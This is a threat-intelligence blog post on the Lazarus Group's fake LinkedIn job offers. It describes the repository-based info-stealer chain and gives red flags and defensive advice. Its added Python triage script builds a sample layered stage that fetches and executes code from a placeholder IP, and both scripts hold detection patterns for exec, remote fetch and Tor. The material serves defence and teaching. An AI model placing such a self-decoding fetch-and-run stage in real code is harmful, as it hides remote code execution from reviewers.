DEFENSESTORM BLOG

From Job Offer to Cyber Threat: Inside the Lazarus Group’s LinkedIn Scam

Tuesday, February 11th, 2025


With recruiters using LinkedIn as a very popular way to research and reach out to potential candidates, bad actors have begun to abuse people's trust and desire for new challenges, luring them in with fake job opportunities as a way to capture their credentials and deliver additional malware.

As sites like LinkedIn become ever more important for keeping up with your network and making new connections across the globe, it is important to remember that not everyone has your best interests in mind.


For this article, we will primarily discuss one attack chain identified by Bitdefender Labs, in which one of their own employees was targeted by a sophisticated, active campaign attributed to the North Korea-linked Lazarus Group.

The Set-Up

The attack began when the employee was contacted via a LinkedIn message about an opportunity to collaborate on a decentralized cryptocurrency exchange.

The details of the job are deliberately vague; the pitch typically promises some combination of the following:

  • Remote work
  • Part-time flexibility
  • Reasonable pay

Some additional variations of this scam also include “projects” and “opportunities” related to travel or financial domains.

Once the target expresses interest, the "hiring process" unfolds and the bad actor springs into action. As with many job opportunities, they first request a resume from the target. The resume gives the attacker additional insight into the target, which is then used to build a level of trust that will later be exploited.

Once the conversation has progressed, the bad actor shares a repository containing the "minimum viable product" (MVP) of the project and asks the target to "review" it and provide feedback before moving forward with the interview process. To make sure the target actually runs the code, the attacker also includes a feedback form with questions that can only be answered by executing the demo.

Payload Execution

At first glance, the code used for the demo appears to be harmless. On much closer inspection, however, it contains a heavily obfuscated script that delivers the payload by dynamically loading malicious code from a third-party endpoint.

This payload is a cross-platform info-stealer that runs on Windows, macOS and Linux, so the payload works regardless of the target's operating system. The specific info-stealer discussed here is engineered to focus on cryptocurrency wallets found on the system. It does so by checking the installed browser extensions against a hard-coded list of extension IDs belonging to cryptocurrency wallets.

Once deployed, the info-stealer gets to work collecting the files belonging to those cryptocurrency wallets. On top of that, it collects the login data of the browsers in use and exfiltrates everything to a malicious IP address whose server appears to host other malicious files. Once all the desired data has been exfiltrated, the info-stealer downloads and executes an additional Python script named main99_65.py that sets the stage for further malicious activity.

Next Stage

To remain hidden until it is time to strike, the Python script (main99_65.py) decompresses and decodes itself recursively until it finally reveals the next stage: a hidden script that downloads three additional Python modules:

mlip.py

  • Hooks keyboard events specifically targeting web browsers.
  • Monitors clipboard changes system-wide for crypto-related data.
  • Immediately sends stolen data to a remote attacker-controlled server.

pay.py

  • Reports system/network info to the attacker.
  • Searches for valuable files and uploads them to the attacker's C2 server.
  • Maintains a persistent communication channel for additional commands and scripts.

bow.py

  • Iterates over the following browsers: Chrome, Brave, Opera, Yandex, Microsoft Edge
  • The inclusion of Yandex, a browser used primarily in Russia, indicates that the list of potential targets extends into many other parts of the world.
  • Extracts and exfiltrates sensitive browser data (logins and payment info) for Windows, Linux, and macOS
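The two traits described above, a demo that pulls more code from a remote endpoint at run time (Payload Execution) and a stage that decodes and decompresses itself in layers (main99_65.py), can both be checked for before anything is run. The following is an added example for this article, not Bitdefender's analysis tooling and not DefenseStorm's: it peels nested base64/zlib layers statically and reports simple indicators at each depth without executing a single line of the reviewed code. The indicator patterns, the layer shape it unwraps (exec(zlib.decompress(base64.b64decode("...")))), and the sample "demo" file are all constructed here; the 203.0.113.0/24 address is a documentation range, not a real C2.

```python
"""Static triage of a 'please review our MVP' repository before running it.

Added example for this article (not the campaign's code and not vendor
tooling). Peels self-decoding layers without exec()ing anything and reports
cheap indicators at each depth. Sample inputs are constructed below.
"""
import base64
import re
import zlib

# Illustrative static indicators a reviewer can check before running a demo.
# These are assumptions about what to look for, not signatures from the campaign.
INDICATORS = {
    "dynamic_exec": re.compile(r"\b(?:exec|eval)\s*\(|new\s+Function\s*\(", re.I),
    "decode_chain": re.compile(r"b64decode|atob\s*\(|zlib\.decompress|inflate", re.I),
    "remote_fetch": re.compile(r"urlopen|requests\.get|fetch\s*\(|XMLHttpRequest|http\.get", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/"),
}

# Layer shape handled here: exec(zlib.decompress(base64.b64decode("<blob>")))
BLOB_RE = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def scan_text(text):
    """Names of the indicators that fire on one stage's source text."""
    return sorted(name for name, pat in INDICATORS.items() if pat.search(text))


def peel_layers(text, max_depth=16):
    """Statically unwrap nested base64 (+ optional zlib) layers.

    Returns the stage sources outermost first. Nothing is executed, so this
    is safe on untrusted code; max_depth bounds pathological inputs."""
    stages = [text]
    for _ in range(max_depth):
        m = BLOB_RE.search(stages[-1])
        if not m:
            break
        raw = base64.b64decode(m.group(1))
        try:
            raw = zlib.decompress(raw)
        except zlib.error:
            pass  # this layer was base64 only
        stages.append(raw.decode("utf-8", errors="replace"))
    return stages


def triage(text):
    """Peel the layers, then report which indicators fire at each depth."""
    stages = peel_layers(text)
    return {
        "layers": len(stages) - 1,
        "indicators": [scan_text(s) for s in stages],
        "final_stage": stages[-1],
    }


def wrap(stage_source):
    """Build one self-decoding layer; used only to construct the sample."""
    blob = base64.b64encode(zlib.compress(stage_source.encode())).decode()
    return f'import base64, zlib\nexec(zlib.decompress(base64.b64decode("{blob}")))\n'


# Constructed sample: two layers around a stage that loads code from a raw IP
# (203.0.113.0/24 is a documentation range, not a real endpoint).
INNER_STAGE = (
    'import urllib.request\n'
    'exec(urllib.request.urlopen("http://203.0.113.10:8080/m").read())\n'
)
SAMPLE_DEMO_FILE = wrap(wrap(INNER_STAGE))

if __name__ == "__main__":
    report = triage(SAMPLE_DEMO_FILE)
    print(f"peeled {report['layers']} layer(s)")
    for depth, hits in enumerate(report["indicators"]):
        print(f"  depth {depth}: {hits or 'none'}")
    print("innermost stage:\n" + report["final_stage"])
```

Run it against the cloned repository's scripts one file at a time; the outer layers only show exec plus a decode chain, and the remote fetch to a bare IP appears only after the last layer is peeled, which is exactly why a glance at the visible code looks harmless.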

With these modules in place, yet another payload is dropped and executed. This payload adds its binaries to the Microsoft Defender exclusion list, then downloads and starts a Tor proxy to communicate with the C2. Once connected over Tor, it downloads another malicious executable containing multiple modules, including a backdoor for data collection, a crypto miner, and a keylogger that captures, stores and exfiltrates keystrokes.
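The sequence in that paragraph, an exclusion added to Defender followed shortly by something launching from the excluded location and a Tor client starting, is a detectable pattern on its own. The block below is an added example for this article, not DefenseStorm detection content: it correlates a Defender configuration-change event (Windows Defender event ID 5007) with later process-creation events (ID 4688) on the same host inside a time window. The telemetry is constructed inline in a simplified record shape, and the 5007 message text is an approximation of the real "New value:" form, so treat the field layout as an assumption to adapt to your own log pipeline.

```python
"""Correlate a Defender exclusion change with what runs right after it.

Added example for this article, not DefenseStorm detection content. Events
are constructed inline in a simplified shape; on a real host the exclusion
change is Windows Defender event 5007 and the launch is a 4688 / Sysmon
process-creation event. The 5007 message text below is approximated.
"""
import re
from datetime import datetime, timedelta

# Matches "...\Exclusions\Paths\<path> = 0x0" (or \Processes\<name>) in a 5007 message.
EXCLUSION_RE = re.compile(
    r"Exclusions\\(?P<kind>Paths|Processes)\\(?P<value>.+?)\s*=\s*0x0", re.I)
TOR_IMAGE_RE = re.compile(r"(?:^|\\)tor(?:\.exe)?$", re.I)


def ts(s):
    return datetime.fromisoformat(s)


# Constructed events (not real logs): id 5007 = Defender config changed,
# id 4688 = process creation. BUILD02 is a benign control case.
EVENTS = [
    {"ts": ts("2025-02-11T10:00:00"), "host": "WS01", "id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. New value: "
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\dev\AppData\Local\Temp\mvp = 0x0"},
    {"ts": ts("2025-02-11T10:00:42"), "host": "WS01", "id": 4688,
     "image": r"C:\Users\dev\AppData\Local\Temp\mvp\tor\tor.exe"},
    {"ts": ts("2025-02-11T10:01:10"), "host": "WS01", "id": 4688,
     "image": r"C:\Windows\System32\notepad.exe"},
    {"ts": ts("2025-02-11T08:00:00"), "host": "BUILD02", "id": 5007,
     "message": r"Microsoft Defender Antivirus Configuration has changed. New value: "
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\D:\agent\work = 0x0"},
    {"ts": ts("2025-02-11T15:30:00"), "host": "BUILD02", "id": 4688,
     "image": r"D:\agent\work\build.exe"},
]


def find_exclusion_abuse(events, window_seconds=900):
    """Flag process launches that follow a Defender exclusion on the same host
    within window_seconds: the image sits under an excluded path, shares the
    name of an excluded process, or looks like a Tor client."""
    window = timedelta(seconds=window_seconds)
    exclusions = []  # (ts, host, kind, value) seen so far, in time order
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 5007:
            m = EXCLUSION_RE.search(ev.get("message", ""))
            if m:
                exclusions.append((ev["ts"], ev["host"], m["kind"].lower(), m["value"].lower()))
            continue
        if ev["id"] != 4688:
            continue
        image = ev.get("image", "").lower()
        recent = [x for x in exclusions
                  if x[1] == ev["host"] and timedelta(0) <= ev["ts"] - x[0] <= window]
        reasons = []
        for _, _, kind, value in recent:
            if kind == "paths" and image.startswith(value.rstrip("\\") + "\\"):
                reasons.append(f"launched from freshly excluded path {value}")
            elif kind == "processes" and image.rsplit("\\", 1)[-1] == value.rsplit("\\", 1)[-1]:
                reasons.append(f"matches freshly excluded process {value}")
        if recent and TOR_IMAGE_RE.search(image):
            reasons.append("Tor client started shortly after an exclusion change")
        if reasons:
            alerts.append({"host": ev["host"], "ts": ev["ts"].isoformat(),
                           "image": ev["image"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_exclusion_abuse(EVENTS):
        print(a["ts"], a["host"], a["image"])
        for r in a["reasons"]:
            print("   -", r)
```

The window is the important tuning knob: the build server in the sample also has an exclusion, but the launch from it hours later is normal administration, while an exclusion followed within seconds by a Tor binary starting from the same temp directory is the pattern worth paging on.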

What to look out for?

As social platforms such as LinkedIn increasingly become hotspots for malicious activity, it is important to stay informed about attack techniques like this one and to remain cautious whenever interacting with others online. Attacks like these will only grow more sophisticated as the techniques improve over time, so we need to educate ourselves on what to look out for and on the best practices that help avoid falling victim to one of these scams.

Red Flags

  • Vague job descriptions: No corresponding job posting on the platform. A legitimate opportunity should have a job listing to reference, one that outlines the role and lets potential applicants find it. The absence of one is a potential warning sign that the position is not legitimate.
  • Suspicious code repositories: Keep an eye out for repositories owned by users with random names and an overall lack of proper documentation or contribution history.
  • Poor communication: As with other forms of phishing, look for frequent spelling errors. A refusal to provide alternative contact methods, such as a corporate email address or phone number, for verification is a big red flag.
  • Too-Good-To-Be-True Job Offers: Be wary of job offers that promise high salaries for minimal work or require you to pay upfront for training or equipment.
  • Phishing Links: Scammers may send links that lead to fake websites designed to steal your information. Always hover over links to see where they lead before clicking.
  • Fake Profiles: Look out for profiles with generic photos, incomplete information, or inconsistencies in their work history. Scammers often use fake profiles to gain your trust.

Best Practices

  • Verify authenticity: If there is ever any doubt, always cross-check job offers with official corporate websites and confirm email domains.
  • Adopt a cautious mindset: Scrutinize unsolicited messages and requests for personal information.
  • Report Suspicious Accounts: If you believe you are receiving messages from a bad actor, report the account so that LinkedIn can remove it. You can do so by following these steps:
    1. Go to the Profile: Navigate to the profile you want to report.
    2. Click the More Button: On the member’s profile, click the “More” button (usually represented by three dots).
    3. Select Report/Block: From the dropdown menu, select “Report/Block.”
    4. Choose the Reason: In the pop-up window, select “Report [member’s name]” or “Report entire account.”
    5. Specify the Issue: Choose the reason for your report, such as “This person is impersonating someone” or “This account is not a real person.”
    6. Submit the Report: Click "Submit report" to complete the process.

Additional DefenseStorm Recommendations

Continuous research is being conducted on all newly discovered or recurring malware and ransomware. As always, DefenseStorm recommends the following practices to help secure your environment:

  • Continued internal training for phishing campaigns
  • Block threat indicators at their respective controls
  • Keep all systems and software updated to the latest patched versions to best protect against all known security vulnerabilities
  • Maintain a strong password policy
  • Enable multi-factor authentication
  • Regularly back up data, and keep backup copies offline, air-gapped and password-protected
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location
  • Apply application hardening
  • Restrict administrative access

Ian Gibson

Cyber Threat Intelligence Engineer

Ian Gibson is a Cyber Threat Intelligence Engineer for DefenseStorm. He joined the company in 2019 after graduating with a bachelor's in Information Technology from the University of North Carolina Wilmington. During his time at UNCW, he completed a specialized curriculum path in Cyber Defense Education. Joining DefenseStorm first as an intern, Ian worked in many positions throughout the company, which allowed him to become an expert in several areas of the platform. During his cyber career, Ian has been instrumental in proactively detecting and responding to cyber incidents, developing new policies and analytics to improve the detection and prevention of potential attacks, and training customers to better utilize DefenseStorm's services. Ian has completed all tracks of the MITRE ATT&CK® Defender certifications, which helped him gain a better understanding of how to apply knowledge of adversary behaviors to improve security configurations, analytics, and decision-making when it comes to best protecting DefenseStorm clients. Ian also holds a GIAC Cyber Threat Intelligence (GCTI) certification.